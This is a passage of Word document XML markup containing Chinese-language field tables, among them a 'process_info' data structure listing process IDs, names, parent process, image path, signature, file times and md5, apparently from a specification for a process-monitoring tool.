        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20D37544" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>start_address_str</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B46768F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="093F4962" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BEEEAC6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>开始地址</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="059C91BA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72926CA3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>mem_protect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="765EAB5D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28E0FC42" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A3A31FD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>内存保护</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="594C5C8A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="628F45BD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>mem_type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D735434" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C7221FD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="018EAB40" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>内存类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6186ED01" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="250" w:name="processinfo数据结构"/>
      <w:bookmarkEnd w:id="249"/>
      <w:r>
        <w:t>process_info数据结构</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2327"/>
        <w:gridCol w:w="1006"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="4387"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="77AF17A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03F20A0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60D344C2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2401ADE1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F785DB0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="12AE9527" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="132C5A09" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>process_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2786CD6F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7983DDB5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52DD6668" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5BA715D3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E9CA5D3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>process_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A927361" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F614761" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21FC0060" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7BD5E9FA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33FD2D46" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>parent_process_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12BEA64E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36FEC9F1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6795E097" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>父进程ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1E09D4DB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="587E15F4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>parent_process_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="781D0E79" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DC13A30" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48E1EB39" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>父进程名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="216F2D01" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A37A5A7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>image_file_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43DAFE8A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4363CC2C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="669C9E3B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程映像文件的全路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="01B7B3C2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="411E4499" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>create_time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="413A7521" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AAC3AC4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C5771DB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>创建时间，时间戳，精确到秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="50DD5BAB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F77BABE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>b_64bit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F43FDBE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E6A3006" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AC13364" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>64进程标志</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="60F38FAF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57128EE1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>b_wow64</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E002CD2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67C46162" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73D8D86C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>32位进程在64位系统标志</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0F31E0DF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7ADC0E81" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>signature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67255436" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E1C8472" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4711C14F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>签名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="364403A0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="078C9771" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>f_size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="379A8804" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E60E39C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2608AF91" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件大小</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0FDD29E6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A4BE292" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>f_user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C3FE5E2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A63100E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="056BB3CB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件所有者</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="447B0231" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="329D040B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>f_type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CB0E945" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39F1DCA6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EAAAB51" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>32/64/空 表示 32位文件，64位文件，空未知</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3B4C27FB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E0FDB61" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>f_ctime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01600051" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AF8E25D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1910F9CF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件create time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1CEDD72B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73A6A158" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>f_mtime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A88B304" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="494878A5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C4923C2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件modify time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="52F44067" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B6452AD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>f_atime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02C4B0AF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EBAEA89" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73C4761E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件access time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0B2FF8B1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F5791A5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D7B6C2A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62F15F99" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60ED5057" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>全文md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
